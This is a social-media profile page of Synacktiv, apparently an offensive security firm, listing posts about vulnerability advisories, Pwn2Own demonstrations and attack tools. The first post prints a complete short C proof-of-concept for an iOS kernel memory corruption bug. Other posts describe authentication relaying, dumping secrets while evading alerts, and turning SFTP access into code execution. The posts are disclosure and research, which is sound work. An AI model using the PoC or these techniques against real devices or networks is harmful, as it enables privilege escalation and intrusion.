user avatar
Synacktiv
@Synacktiv
Offensive security company. Dojo of many ninjas. Red teaming, reverse engineering, vuln research, dev of security tools and incident response.
France
Joined April 2012
Posts
  • user avatar
    The PoC is even tweetable ;) void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}
    iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox
  • user avatar
    You can now relay any protocol to SMB over Kerberos with krbrelayx.py and the latest PRs from @hugow_vincent. Thanks @_dirkjan for merging it! Here is an example from SMB to SMB:
  • user avatar
    Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d. synacktiv.com/publications/n…
  • user avatar
    To facilitate reverse-engineering of large programs, vulnerability research and root-cause analysis on iOS, Android, and other major platforms, @myr463 and @Hexabeast released Frinet, a tool combining Frida with an enhanced version of Tenet.
  • user avatar
    Lazy to write payloads in @Burp_Suite? HopLa adds autocompletion support and a custom payload library! 🤠 github.com/synacktiv/HopLa cc @alexisdanizan
    GIF
  • user avatar
    In our latest article, @l4x4 revisits the secretsdump implementation, offering an alternative avoiding reg save and eliminates writing files to disk, significantly reducing the likelihood of triggering security alerts. Read the details at synacktiv.com/publications/l….
  • user avatar
    This is for the Pwners: exploiting a WebKit 0-day in PlayStation 4! We are happy to announce that @0xdagger and @abu_y0ussef will present their work on breaking the PS4 at #BHEU @BlackHatEvents ! blackhat.com/eu-20/briefing…
    GIF
  • user avatar
    If you see two guys wearing Synacktiv t-shirts with big antennas, you should turn around with your @Tesla! 0-click RCE demonstration on a real vehicle, with CAN messages sent to switch on headlights, wipers and trunk 😎 #Pwn2Own
    00:00
  • user avatar
    You can now use LDAP/LDAPs protocols with the SOCKS proxy of ntlmrelayx thanks to the PR from @b1two_ (now merged upstream). Here is an example with ldeep using relayed authentication from HTTP to LDAPs :
  • user avatar
    Since MSRC just published a fix for CVE-2020-0796, here's @_lucas_georges_ quick and dirty root cause analysis on it: synacktiv.com/posts/exploit/… #sambadijaneiro
  • user avatar
    As no details are available yet, our expert @0xf4b started investigating one of the three iOS vulnerabilities that are exploited in the wild and fixed by version 14.2. You can read the story in our latest blogpost! synacktiv.com/publications/i…
  • user avatar
    We are in 2021 and SFTP access will never grant you a PTY. But you may still be able to use it to forward data to local ports, remote ports and to Unix domain sockets. A Remote Code Execution is then never far away! #synacktips
  • user avatar
    Ninjas are getting ready for #P2OVancouver 💪 #Pwn2Own
  • user avatar
    Watchout! CVE-2023-22809 on Sudo was patched today to prevent a privilege escalation on sudoedit. Read the security advisory by @aevy__ and @v1csec: synacktiv.com/sites/default/…